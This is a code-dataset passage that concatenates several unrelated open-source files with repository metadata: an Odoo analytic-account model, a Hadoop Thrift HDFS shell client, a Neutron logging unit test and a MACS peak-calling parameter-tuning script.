def test_non_string_input(self):
self.assertEqual(truncatewords(123, 2), '123')
| bsd-3-clause | -2,592,121,439,148,183,000 | 36.065217 | 125 | 0.624633 | false |
simongoffin/my_odoo_tutorial | addons/analytic/analytic.py | 12 | 17961 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from datetime import datetime
from openerp.osv import fields, osv
from openerp import tools
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
class account_analytic_account(osv.osv):
_name = 'account.analytic.account'
_inherit = ['mail.thread']
_description = 'Analytic Account'
_track = {
'state': {
'analytic.mt_account_pending': lambda self, cr, uid, obj, ctx=None: obj.state == 'pending',
'analytic.mt_account_closed': lambda self, cr, uid, obj, ctx=None: obj.state == 'close',
'analytic.mt_account_opened': lambda self, cr, uid, obj, ctx=None: obj.state == 'open',
},
}
def _compute_level_tree(self, cr, uid, ids, child_ids, res, field_names, context=None):
currency_obj = self.pool.get('res.currency')
recres = {}
def recursive_computation(account):
result2 = res[account.id].copy()
for son in account.child_ids:
result = recursive_computation(son)
for field in field_names:
if (account.currency_id.id != son.currency_id.id) and (field!='quantity'):
result[field] = currency_obj.compute(cr, uid, son.currency_id.id, account.currency_id.id, result[field], context=context)
result2[field] += result[field]
return result2
for account in self.browse(cr, uid, ids, context=context):
if account.id not in child_ids:
continue
recres[account.id] = recursive_computation(account)
return recres
def _debit_credit_bal_qtty(self, cr, uid, ids, fields, arg, context=None):
res = {}
if context is None:
context = {}
child_ids = tuple(self.search(cr, uid, [('parent_id', 'child_of', ids)]))
for i in child_ids:
res[i] = {}
for n in fields:
res[i][n] = 0.0
if not child_ids:
return res
where_date = ''
where_clause_args = [tuple(child_ids)]
if context.get('from_date', False):
where_date += " AND l.date >= %s"
where_clause_args += [context['from_date']]
if context.get('to_date', False):
where_date += " AND l.date <= %s"
where_clause_args += [context['to_date']]
cr.execute("""
SELECT a.id,
sum(
CASE WHEN l.amount > 0
THEN l.amount
ELSE 0.0
END
) as debit,
sum(
CASE WHEN l.amount < 0
THEN -l.amount
ELSE 0.0
END
) as credit,
COALESCE(SUM(l.amount),0) AS balance,
COALESCE(SUM(l.unit_amount),0) AS quantity
FROM account_analytic_account a
LEFT JOIN account_analytic_line l ON (a.id = l.account_id)
WHERE a.id IN %s
""" + where_date + """
GROUP BY a.id""", where_clause_args)
for row in cr.dictfetchall():
res[row['id']] = {}
for field in fields:
res[row['id']][field] = row[field]
return self._compute_level_tree(cr, uid, ids, child_ids, res, fields, context)
def name_get(self, cr, uid, ids, context=None):
res = []
if not ids:
return res
if isinstance(ids, (int, long)):
ids = [ids]
for id in ids:
elmt = self.browse(cr, uid, id, context=context)
res.append((id, self._get_one_full_name(elmt)))
return res
def _get_full_name(self, cr, uid, ids, name=None, args=None, context=None):
if context == None:
context = {}
res = {}
for elmt in self.browse(cr, uid, ids, context=context):
res[elmt.id] = self._get_one_full_name(elmt)
return res
def _get_one_full_name(self, elmt, level=6):
if level<=0:
return '...'
if elmt.parent_id and not elmt.type == 'template':
parent_path = self._get_one_full_name(elmt.parent_id, level-1) + " / "
else:
parent_path = ''
return parent_path + elmt.name
def _child_compute(self, cr, uid, ids, name, arg, context=None):
result = {}
if context is None:
context = {}
for account in self.browse(cr, uid, ids, context=context):
result[account.id] = map(lambda x: x.id, [child for child in account.child_ids if child.state != 'template'])
return result
def _get_analytic_account(self, cr, uid, ids, context=None):
company_obj = self.pool.get('res.company')
analytic_obj = self.pool.get('account.analytic.account')
accounts = []
for company in company_obj.browse(cr, uid, ids, context=context):
accounts += analytic_obj.search(cr, uid, [('company_id', '=', company.id)])
return accounts
def _set_company_currency(self, cr, uid, ids, name, value, arg, context=None):
if isinstance(ids, (int, long)):
ids=[ids]
for account in self.browse(cr, uid, ids, context=context):
if account.company_id:
if account.company_id.currency_id.id != value:
raise osv.except_osv(_('Error!'), _("If you set a company, the currency selected has to be the same as it's currency. \nYou can remove the company belonging, and thus change the currency, only on analytic account of type 'view'. This can be really useful for consolidation purposes of several companies charts with different currencies, for example."))
if value:
cr.execute("""update account_analytic_account set currency_id=%s where id=%s""", (value, account.id))
self.invalidate_cache(cr, uid, ['currency_id'], [account.id], context=context)
def _currency(self, cr, uid, ids, field_name, arg, context=None):
result = {}
for rec in self.browse(cr, uid, ids, context=context):
if rec.company_id:
result[rec.id] = rec.company_id.currency_id.id
else:
result[rec.id] = rec.currency_id.id
return result
_columns = {
'name': fields.char('Account/Contract Name', required=True, track_visibility='onchange'),
'complete_name': fields.function(_get_full_name, type='char', string='Full Name'),
'code': fields.char('Reference', select=True, track_visibility='onchange', copy=False),
'type': fields.selection([('view','Analytic View'), ('normal','Analytic Account'),('contract','Contract or Project'),('template','Template of Contract')], 'Type of Account', required=True,
help="If you select the View Type, it means you won\'t allow to create journal entries using that account.\n"\
"The type 'Analytic account' stands for usual accounts that you only want to use in accounting.\n"\
"If you select Contract or Project, it offers you the possibility to manage the validity and the invoicing options for this account.\n"\
"The special type 'Template of Contract' allows you to define a template with default data that you can reuse easily."),
'template_id': fields.many2one('account.analytic.account', 'Template of Contract'),
'description': fields.text('Description'),
'parent_id': fields.many2one('account.analytic.account', 'Parent Analytic Account', select=2),
'child_ids': fields.one2many('account.analytic.account', 'parent_id', 'Child Accounts'),
'child_complete_ids': fields.function(_child_compute, relation='account.analytic.account', string="Account Hierarchy", type='many2many'),
'line_ids': fields.one2many('account.analytic.line', 'account_id', 'Analytic Entries'),
'balance': fields.function(_debit_credit_bal_qtty, type='float', string='Balance', multi='debit_credit_bal_qtty', digits_compute=dp.get_precision('Account')),
'debit': fields.function(_debit_credit_bal_qtty, type='float', string='Debit', multi='debit_credit_bal_qtty', digits_compute=dp.get_precision('Account')),
'credit': fields.function(_debit_credit_bal_qtty, type='float', string='Credit', multi='debit_credit_bal_qtty', digits_compute=dp.get_precision('Account')),
'quantity': fields.function(_debit_credit_bal_qtty, type='float', string='Quantity', multi='debit_credit_bal_qtty'),
'quantity_max': fields.float('Prepaid Service Units', help='Sets the higher limit of time to work on the contract, based on the timesheet. (for instance, number of hours in a limited support contract.)'),
'partner_id': fields.many2one('res.partner', 'Customer'),
'user_id': fields.many2one('res.users', 'Project Manager', track_visibility='onchange'),
'manager_id': fields.many2one('res.users', 'Account Manager', track_visibility='onchange'),
'date_start': fields.date('Start Date'),
'date': fields.date('Expiration Date', select=True, track_visibility='onchange'),
'company_id': fields.many2one('res.company', 'Company', required=False), #not required because we want to allow different companies to use the same chart of account, except for leaf accounts.
'state': fields.selection([('template', 'Template'),
('draft','New'),
('open','In Progress'),
('pending','To Renew'),
('close','Closed'),
('cancelled', 'Cancelled')],
'Status', required=True,
track_visibility='onchange', copy=False),
'currency_id': fields.function(_currency, fnct_inv=_set_company_currency, #the currency_id field is readonly except if it's a view account and if there is no company
store = {
'res.company': (_get_analytic_account, ['currency_id'], 10),
}, string='Currency', type='many2one', relation='res.currency'),
}
def on_change_template(self, cr, uid, ids, template_id, date_start=False, context=None):
if not template_id:
return {}
res = {'value':{}}
template = self.browse(cr, uid, template_id, context=context)
if template.date_start and template.date:
from_dt = datetime.strptime(template.date_start, tools.DEFAULT_SERVER_DATE_FORMAT)
to_dt = datetime.strptime(template.date, tools.DEFAULT_SERVER_DATE_FORMAT)
timedelta = to_dt - from_dt
res['value']['date'] = datetime.strftime(datetime.now() + timedelta, tools.DEFAULT_SERVER_DATE_FORMAT)
if not date_start:
res['value']['date_start'] = fields.date.today()
res['value']['quantity_max'] = template.quantity_max
res['value']['parent_id'] = template.parent_id and template.parent_id.id or False
res['value']['description'] = template.description
return res
def on_change_partner_id(self, cr, uid, ids,partner_id, name, context=None):
res={}
if partner_id:
partner = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context)
if partner.user_id:
res['manager_id'] = partner.user_id.id
if not name:
res['name'] = _('Contract: ') + partner.name
return {'value': res}
def _default_company(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
if user.company_id:
return user.company_id.id
return self.pool.get('res.company').search(cr, uid, [('parent_id', '=', False)])[0]
def _get_default_currency(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
return user.company_id.currency_id.id
_defaults = {
'type': 'normal',
'company_id': _default_company,
'code' : lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'account.analytic.account'),
'state': 'open',
'user_id': lambda self, cr, uid, ctx: uid,
'partner_id': lambda self, cr, uid, ctx: ctx.get('partner_id', False),
'date_start': lambda *a: time.strftime('%Y-%m-%d'),
'currency_id': _get_default_currency,
}
def check_recursion(self, cr, uid, ids, context=None, parent=None):
return super(account_analytic_account, self)._check_recursion(cr, uid, ids, context=context, parent=parent)
_order = 'code, name asc'
_constraints = [
(check_recursion, 'Error! You cannot create recursive analytic accounts.', ['parent_id']),
]
def name_create(self, cr, uid, name, context=None):
raise osv.except_osv(_('Warning'), _("Quick account creation disallowed."))
def copy(self, cr, uid, id, default=None, context=None):
if not default:
default = {}
analytic = self.browse(cr, uid, id, context=context)
default['name'] = _("%s (copy)") % analytic['name']
return super(account_analytic_account, self).copy(cr, uid, id, default, context=context)
def on_change_company(self, cr, uid, id, company_id):
if not company_id:
return {}
currency = self.pool.get('res.company').read(cr, uid, [company_id], ['currency_id'])[0]['currency_id']
return {'value': {'currency_id': currency}}
def on_change_parent(self, cr, uid, id, parent_id):
if not parent_id:
return {}
parent = self.read(cr, uid, [parent_id], ['partner_id','code'])[0]
if parent['partner_id']:
partner = parent['partner_id'][0]
else:
partner = False
res = {'value': {}}
if partner:
res['value']['partner_id'] = partner
return res
def name_search(self, cr, uid, name, args=None, operator='ilike', context=None, limit=100):
if not args:
args=[]
if context is None:
context={}
if name:
account_ids = self.search(cr, uid, [('code', '=', name)] + args, limit=limit, context=context)
if not account_ids:
dom = []
for name2 in name.split('/'):
name = name2.strip()
account_ids = self.search(cr, uid, dom + [('name', 'ilike', name)] + args, limit=limit, context=context)
if not account_ids: break
dom = [('parent_id','in',account_ids)]
else:
account_ids = self.search(cr, uid, args, limit=limit, context=context)
return self.name_get(cr, uid, account_ids, context=context)
class account_analytic_line(osv.osv):
_name = 'account.analytic.line'
_description = 'Analytic Line'
_columns = {
'name': fields.char('Description', required=True),
'date': fields.date('Date', required=True, select=True),
'amount': fields.float('Amount', required=True, help='Calculated by multiplying the quantity and the price given in the Product\'s cost price. Always expressed in the company main currency.', digits_compute=dp.get_precision('Account')),
'unit_amount': fields.float('Quantity', help='Specifies the amount of quantity to count.'),
'account_id': fields.many2one('account.analytic.account', 'Analytic Account', required=True, ondelete='restrict', select=True, domain=[('type','<>','view')]),
'user_id': fields.many2one('res.users', 'User'),
'company_id': fields.related('account_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),
}
def _get_default_date(self, cr, uid, context=None):
return fields.date.context_today(self, cr, uid, context=context)
def __get_default_date(self, cr, uid, context=None):
return self._get_default_date(cr, uid, context=context)
_defaults = {
'date': __get_default_date,
'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'account.analytic.line', context=c),
'amount': 0.00
}
_order = 'date desc'
def _check_no_view(self, cr, uid, ids, context=None):
analytic_lines = self.browse(cr, uid, ids, context=context)
for line in analytic_lines:
if line.account_id.type == 'view':
return False
return True
_constraints = [
(_check_no_view, 'You cannot create analytic line on view account.', ['account_id']),
]
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -3,811,703,180,882,763,300 | 49.310924 | 372 | 0.581872 | false |
liangly/hadoop-common | src/contrib/thriftfs/scripts/hdfs.py | 116 | 14991 | #!/usr/bin/env python
"""
hdfs.py is a python client for the thrift interface to HDFS.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied. See the License for the specific language governing permissions
and limitations under the License.
"""
import sys
sys.path.append('../gen-py')
from optparse import OptionParser
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from hadoopfs import ThriftHadoopFileSystem
from hadoopfs.ttypes import *
from readline import *
from cmd import *
import os
import re
import readline
import subprocess
#
# The address of the FileSystemClientProxy. If the host and port are
# not specified, then a proxy server is automatically spawned.
#
host = 'localhost'
port = 4677 # use any port
proxyStartScript = './start_thrift_server.sh'
startServer = True # shall we start a proxy server?
#
# The hdfs interactive shell. The Cmd class is a builtin that uses readline + implements
# a whole bunch of utility stuff like help and custom tab completions.
# It makes everything real easy.
#
class hadoopthrift_cli(Cmd):
# my custom prompt looks better than the default
prompt = 'hdfs>> '
#############################
# Class constructor
#############################
def __init__(self, server_name, server_port):
Cmd.__init__(self)
self.server_name = server_name
self.server_port = server_port
#############################
# Start the ClientProxy Server if we can find it.
# Read in its stdout to determine what port it is running on
#############################
def startProxyServer(self):
try:
p = subprocess.Popen(proxyStartScript, self.server_port, stdout=subprocess.PIPE)
content = p.stdout.readline()
p.stdout.close()
val = re.split( '\[|\]', content)
print val[1]
self.server_port = val[1]
return True
except Exception, ex:
print "ERROR in starting proxy server " + proxyStartScript
print '%s' % (ex.message)
return False
#############################
# Connect to clientproxy
#############################
def connect(self):
try:
# connect to hdfs thrift server
self.transport = TSocket.TSocket(self.server_name, self.server_port)
self.transport = TTransport.TBufferedTransport(self.transport)
self.protocol = TBinaryProtocol.TBinaryProtocol(self.transport)
# Create a client to use the protocol encoder
self.client = ThriftHadoopFileSystem.Client(self.protocol)
self.transport.open()
# tell the HadoopThrift server to die after 60 minutes of inactivity
self.client.setInactivityTimeoutPeriod(60*60)
return True
except Thrift.TException, tx:
print "ERROR in connecting to ", self.server_name, ":", self.server_port
print '%s' % (tx.message)
return False
#
# Disconnect from client proxy
#
def shutdown(self):
try :
self.transport.close()
except Exception, tx:
return False
#############################
# Create the specified file. Returns a handle to write data.
#############################
def do_create(self, name):
if name == "":
print " ERROR usage: create <pathname>"
print
return 0
# Create the file, and immediately closes the handle
path = Pathname();
path.pathname = name;
status = self.client.create(path)
self.client.close(status)
return 0
#############################
# Delete the specified file.
#############################
def do_rm(self, name):
if name == "":
print " ERROR usage: rm <pathname>\n"
return 0
# delete file
path = Pathname();
path.pathname = name;
status = self.client.rm(path, False)
if status == False:
print " ERROR in deleting path: " + name
return 0
#############################
# Rename the specified file/dir
#############################
def do_mv(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: mv <srcpathname> <destpathname>\n"
return 0
src = params[0].strip()
dest = params[1].strip()
if src == "":
print " ERROR usage: mv <srcpathname> <destpathname>\n"
return 0
if dest == "":
print " ERROR usage: mv <srcpathname> <destpathname>\n"
return 0
# move file
path = Pathname();
path.pathname = src;
destpath = Pathname();
destpath.pathname = dest;
status = self.client.rename(path, destpath)
if status == False:
print " ERROR in renaming path: " + name
return 0
#############################
# Delete the specified file.
#############################
def do_mkdirs(self, name):
if name == "":
print " ERROR usage: mkdirs <pathname>\n"
return 0
# create directory
path = Pathname();
path.pathname = name;
fields = self.client.mkdirs(path)
return 0
#############################
# does the pathname exist?
#############################
def do_exists(self, name):
if name == "":
print " ERROR usage: exists <pathname>\n"
return 0
# check existence of pathname
path = Pathname();
path.pathname = name;
fields = self.client.exists(path)
if (fields == True):
print name + " exists."
else:
print name + " does not exist."
return 0
#############################
# copy local file into hdfs
#############################
def do_put(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: put <localpathname> <hdfspathname>\n"
return 0
local = params[0].strip()
hdfs = params[1].strip()
if local == "":
print " ERROR usage: put <localpathname> <hdfspathname>\n"
return 0
if hdfs == "":
print " ERROR usage: put <localpathname> <hdfspathname>\n"
return 0
# open local file
input = open(local, 'rb')
# open output file
path = Pathname();
path.pathname = hdfs;
output = self.client.create(path)
# read 1MB at a time and upload to hdfs
while True:
chunk = input.read(1024*1024)
if not chunk: break
self.client.write(output, chunk)
self.client.close(output)
input.close()
#############################
# copy hdfs file into local
#############################
def do_get(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: get <hdfspathname> <localpathname>\n"
return 0
hdfs = params[0].strip()
local = params[1].strip()
if local == "":
print " ERROR usage: get <hdfspathname> <localpathname>\n"
return 0
if hdfs == "":
print " ERROR usage: get <hdfspathname> <localpathname>\n"
return 0
# open output local file
output = open(local, 'wb')
# open input hdfs file
path = Pathname();
path.pathname = hdfs;
input = self.client.open(path)
# find size of hdfs file
filesize = self.client.stat(path).length
# read 1MB bytes at a time from hdfs
offset = 0
chunksize = 1024 * 1024
while True:
chunk = self.client.read(input, offset, chunksize)
if not chunk: break
output.write(chunk)
offset += chunksize
if (offset >= filesize): break
self.client.close(input)
output.close()
#############################
# List attributes of this path
#############################
def do_ls(self, name):
if name == "":
print " ERROR usage: list <pathname>\n"
return 0
# list file status
path = Pathname();
path.pathname = name;
status = self.client.stat(path)
if (status.isdir == False):
self.printStatus(status)
return 0
# This is a directory, fetch its contents
liststatus = self.client.listStatus(path)
for item in liststatus:
self.printStatus(item)
#############################
# Set permissions for a file
#############################
def do_chmod(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: chmod 774 <pathname>\n"
return 0
perm = params[0].strip()
name = params[1].strip()
if name == "":
print " ERROR usage: chmod 774 <pathname>\n"
return 0
if perm == "":
print " ERROR usage: chmod 774 <pathname>\n"
return 0
# set permissions (in octal)
path = Pathname();
path.pathname = name;
status = self.client.chmod(path, int(perm,8))
return 0
#############################
# Set owner for a file. This is not an atomic operation.
# A change to the group of a file may be overwritten by this one.
#############################
def do_chown(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: chown <ownername> <pathname>\n"
return 0
owner = params[0].strip()
name = params[1].strip()
if name == "":
print " ERROR usage: chown <ownername> <pathname>\n"
return 0
# get the current owner and group
path = Pathname();
path.pathname = name;
cur = self.client.stat(path)
# set new owner, keep old group
status = self.client.chown(path, owner, cur.group)
return 0
#######################################
# Set the replication factor for a file
######################################
def do_setreplication(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: setreplication <replication factor> <pathname>\n"
return 0
repl = params[0].strip()
name = params[1].strip()
if name == "":
print " ERROR usage: setreplication <replication factor> <pathname>\n"
return 0
if repl == "":
print " ERROR usage: setreplication <replication factor> <pathname>\n"
return 0
path = Pathname();
path.pathname = name;
status = self.client.setReplication(path, int(repl))
return 0
#############################
# Display the locations of the blocks of this file
#############################
def do_getlocations(self, name):
if name == "":
print " ERROR usage: getlocations <pathname>\n"
return 0
path = Pathname();
path.pathname = name;
# find size of hdfs file
filesize = self.client.stat(path).length
# getlocations file
blockLocations = self.client.getFileBlockLocations(path, 0, filesize)
for item in blockLocations:
self.printLocations(item)
return 0
#############################
# Utility methods from here
#############################
#
# If I don't do this, the last command is always re-executed which is annoying.
#
def emptyline(self):
pass
#
# print the status of a path
#
def printStatus(self, stat):
print str(stat.block_replication) + "\t" + str(stat.length) + "\t" + str(stat.modification_time) + "\t" + stat.permission + "\t" + stat.owner + "\t" + stat.group + "\t" + stat.path
#
# print the locations of a block
#
def printLocations(self, location):
print str(location.names) + "\t" + str(location.offset) + "\t" + str(location.length)
#
# Various ways to exit the hdfs shell
#
def do_quit(self,ignored):
try:
if startServer:
self.client.shutdown(1)
return -1
except Exception, ex:
return -1
def do_q(self,ignored):
return self.do_quit(ignored)
# ctl-d
def do_EOF(self,ignored):
return self.do_quit(ignored)
#
# Give the user some amount of help - I am a nice guy
#
def help_create(self):
print "create <pathname>"
def help_rm(self):
print "rm <pathname>"
def help_mv(self):
print "mv <srcpathname> <destpathname>"
def help_mkdirs(self):
print "mkdirs <pathname>"
def help_exists(self):
print "exists <pathname>"
def help_put(self):
print "put <localpathname> <hdfspathname>"
def help_get(self):
print "get <hdfspathname> <localpathname>"
def help_ls(self):
print "ls <hdfspathname>"
def help_chmod(self):
print "chmod 775 <hdfspathname>"
def help_chown(self):
print "chown <ownername> <hdfspathname>"
def help_setreplication(self):
print "setrep <replication factor> <hdfspathname>"
def help_getlocations(self):
print "getlocations <pathname>"
def help_EOF(self):
print '<ctl-d> will quit this program.'
def help_quit(self):
print 'if you need to know what quit does, you shouldn\'t be using a computer.'
def help_q(self):
print 'quit and if you need to know what quit does, you shouldn\'t be using a computer.'
def help_help(self):
print 'duh'
def usage(exec_name):
print "Usage: "
print " %s [proxyclientname [proxyclientport]]" % exec_name
print " %s -v" % exec_name
print " %s --help" % exec_name
print " %s -h" % exec_name
if __name__ == "__main__":
#
# Rudimentary command line processing.
#
# real parsing:
parser = OptionParser()
parser.add_option("-e", "--execute", dest="command_str",
help="execute this command and exit")
parser.add_option("-s","--proxyclient",dest="host",help="the proxyclient's hostname")
parser.add_option("-p","--port",dest="port",help="the proxyclient's port number")
(options, args) = parser.parse_args()
#
# Save host and port information of the proxy server
#
if (options.host):
host = options.host
startServer = False
if (options.port):
port = options.port
startServer = False
#
# Retrieve the user's readline history.
#
historyFileName = os.path.expanduser("~/.hdfs_history")
if (os.path.exists(historyFileName)):
readline.read_history_file(historyFileName)
#
# Create class and connect to proxy server
#
c = hadoopthrift_cli(host,port)
if startServer:
if c.startProxyServer() == False:
sys.exit(1)
if c.connect() == False:
sys.exit(1)
#
# If this utility was invoked with one argument, process it
#
if (options.command_str):
c.onecmd(options.command_str)
sys.exit(0)
#
# Start looping over user commands.
#
c.cmdloop('Welcome to the Thrift interactive shell for Hadoop File System. - how can I help you? ' + '\n'
'Press tab twice to see the list of commands. ' + '\n' +
'To complete the name of a command press tab once. \n'
)
c.shutdown();
readline.write_history_file(historyFileName)
print '' # I am nothing if not courteous.
sys.exit(0)
| apache-2.0 | -5,939,983,571,205,586,000 | 26.010811 | 184 | 0.590955 | false |
gopal1cloud/neutron | neutron/tests/unit/test_common_log.py | 22 | 2943 | # Copyright (c) 2013 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.common import log as call_log
from neutron.tests import base
MODULE_NAME = 'neutron.tests.unit.test_common_log'
class TargetKlass(object):
@call_log.log
def test_method(self, arg1, arg2, *args, **kwargs):
pass
class TestCallLog(base.BaseTestCase):
def setUp(self):
super(TestCallLog, self).setUp()
self.klass = TargetKlass()
self.expected_format = ('%(class_name)s method %(method_name)s '
'called with arguments %(args)s %(kwargs)s')
self.expected_data = {'class_name': MODULE_NAME + '.TargetKlass',
'method_name': 'test_method',
'args': (),
'kwargs': {}}
def test_call_log_all_args(self):
self.expected_data['args'] = (10, 20)
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(10, 20)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
def test_call_log_all_kwargs(self):
self.expected_data['kwargs'] = {'arg1': 10, 'arg2': 20}
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(arg1=10, arg2=20)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
def test_call_log_known_args_unknown_args_kwargs(self):
self.expected_data['args'] = (10, 20, 30)
self.expected_data['kwargs'] = {'arg4': 40}
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(10, 20, 30, arg4=40)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
def test_call_log_known_args_kwargs_unknown_kwargs(self):
self.expected_data['args'] = (10,)
self.expected_data['kwargs'] = {'arg2': 20, 'arg3': 30, 'arg4': 40}
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(10, arg2=20, arg3=30, arg4=40)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
| apache-2.0 | -2,569,345,095,315,506,000 | 41.042857 | 78 | 0.589534 | false |
odb9402/OPPA | oppa/macs/archive.py | 1 | 5675 | """
this module is actual fix some parameter by using
bayesian optimization. if we run this function in parallel,
we need to satisfied many condition which mentioned in the paper
named 'practical bayesian optimization in machine learning algorithm'
"""
from math import exp
import subprocess
import time
from multiprocessing import cpu_count
from multiprocessing import Process
from ..optimizeHyper import run as optimizeHyper
from ..calculateError import run as calculateError
from ..loadParser.loadLabel import run as loadLabel
from ..loadParser.parseLabel import run as parseLabel
def learnMACSparam(args, test_set, validation_set, PATH):
"""
this function actually control learning steps. args is given by
oppa.py ( main function of this program ) from command line.
and make wrapper_function to use BayesianOptimization library,
only wrapper_function`s arguments will be learned by library.
:param args:
argument from command lines
:param test_set:
python list of test set
:param validation_set:
python list of validation set
:return: learned parameter.
"""
input_file = args.input
control = args.control
call_type = args.callType
def wrapper_narrow_cut(opt_Qval):
correct = run(input_file, validation_set, str(exp(opt_Qval/100)-1), call_type, control)
print "Qval :"+str(exp(opt_Qval/100)-1)
return correct
def wrapper_broad_cut(opt_Qval, opt_cutoff):
correct = run(input_file, validation_set, str(exp(opt_Qval/100)-1), call_type, control, broad=str(exp(opt_cutoff/100)-1))
print "Qval :"+str(exp(opt_Qval/100)-1), "Broad-cutoff:"+str(exp(opt_cutoff/100)-1)
return correct
parameters_bounds_narrow = {'opt_Qval':(10**-8,60.0)}
parameters_bounds_broad = {'opt_Qval':(10**-8,60.0),\
'opt_cutoff':(10**-7,60.0)}
number_of_init_sample = 2
if call_type is None:
result = optimizeHyper(wrapper_narrow_cut, parameters_bounds_narrow, number_of_init_sample)
subprocess.call(['macs2','callpeak','-t',input_file,'-c',control,'-g','hs','-q',str(result['max_params']['opt_Qval'])])
print " final error about test set is :::" + str(final_error)
else:
result = optimizeHyper(wrapper_broad_cut, parameters_bounds_broad, number_of_init_sample)
def run(input_file, valid_set, Qval, call_type, control = None, broad=None):
"""
this function run MACS and calculate error at once.
each arguments will be given by learnMACSparam that from command line.
:param input_file:
input file name.
:param valid_set:
python list of labeled data
:param Qval:
Q-value of MACS. it will be learned.
:param control:
control bam file in MACS. not necessary.
:return:
error rate of between MACS_output and labeled Data.
"""
import MACS
chromosome_list = []
for label in valid_set:
chromosome_list.append(label.split(':')[0])
chromosome_list = list(set(chromosome_list))
reference_char = ".REF_"
bam_name = input_file[:-4] ## delete '.bam'
if control is not None:
cr_bam_name = control[:-4]
MAX_CORE = cpu_count()
TASKS = len(chromosome_list)
TASK_NO = 0
macs_processes = []
while (len(macs_processes) < MAX_CORE-1) and (TASK_NO < TASKS):
if control is not None:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, cr_bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", broad))
else:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, broad=broad))
TASK_NO += 1
while len(macs_processes) > 0:
time.sleep(0.1)
for proc in reversed(range(len(macs_processes))):
if macs_processes[proc].poll() is not None:
del macs_processes[proc]
while (len(macs_processes) < MAX_CORE - 1) and (TASK_NO < TASKS):
if control is not None:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, cr_bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", broad))
else:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, broad=broad))
TASK_NO += 1
#there must be valid validation set and test set.
if not valid_set:
print "there are no matched validation set :p\n"
exit()
#actual learning part
else:
error_num, label_num = summerize_error(bam_name, valid_set, call_type)
if label_num is 0:
return 1.0
return (1 - error_num/label_num) * 100
def summerize_error(bam_name, validation_set, call_type):
"""
:param bam_name:
:param validation_set:
:return:
"""
sum_error_num = 0
sum_label_num = 0
reference_char = ".REF_chr"
if call_type == "broad":
output_format_name = '.broadPeak'
else:
output_format_name = '.narrowPeak'
for chr_no in range(22):
input_name = bam_name + reference_char + str(chr_no+1) + ".bam_peaks" + output_format_name
error_num, label_num = calculateError(input_name, parseLabel(validation_set, input_name))
sum_error_num += error_num
sum_label_num += label_num
# add about sexual chromosome
input_name = bam_name + reference_char + 'X' + ".bam_peaks" + output_format_name
error_num, label_num = calculateError(input_name, parseLabel(validation_set, input_name))
sum_error_num += error_num
sum_label_num += label_num
input_name = bam_name + reference_char + 'Y' + ".bam_peaks" + output_format_name
error_num, label_num = calculateError(input_name, parseLabel(validation_set, input_name))
sum_error_num += error_num
sum_label_num += label_num
return sum_error_num , sum_label_num
| mit | 2,470,161,333,468,017,000 | 32.579882 | 188 | 0.687225 | false |
charlescearl/VirtualMesos | third_party/libprocess/third_party/gmock-1.6.0/gtest/test/gtest_color_test.py | 3259 | 4911 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
